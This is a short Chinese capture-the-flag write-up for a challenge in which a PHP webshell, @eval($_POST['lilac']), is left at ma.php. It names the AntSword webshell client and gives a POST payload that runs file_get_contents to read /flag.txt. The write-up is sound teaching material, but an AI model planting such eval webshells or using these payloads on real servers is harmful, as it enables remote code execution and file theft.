跑马场

本题首先是一个比较好看(但是费CPU)的页面。提示「留了个马」在 ma.php

访问 ma.php 发现源码是公开的。

上网搜索「php 马 利用」,获知 php webshell 可以通过「中国蚁剑」进行利用。安装后直接执行即可。

事实上,对于会一点 PHP 的同学,看到 @eval($_POST['lilac']) 后直接用浏览器 Hackbar 或者 burp 提交 lilac=echo file_get_contents('/flag.txt'); 即可。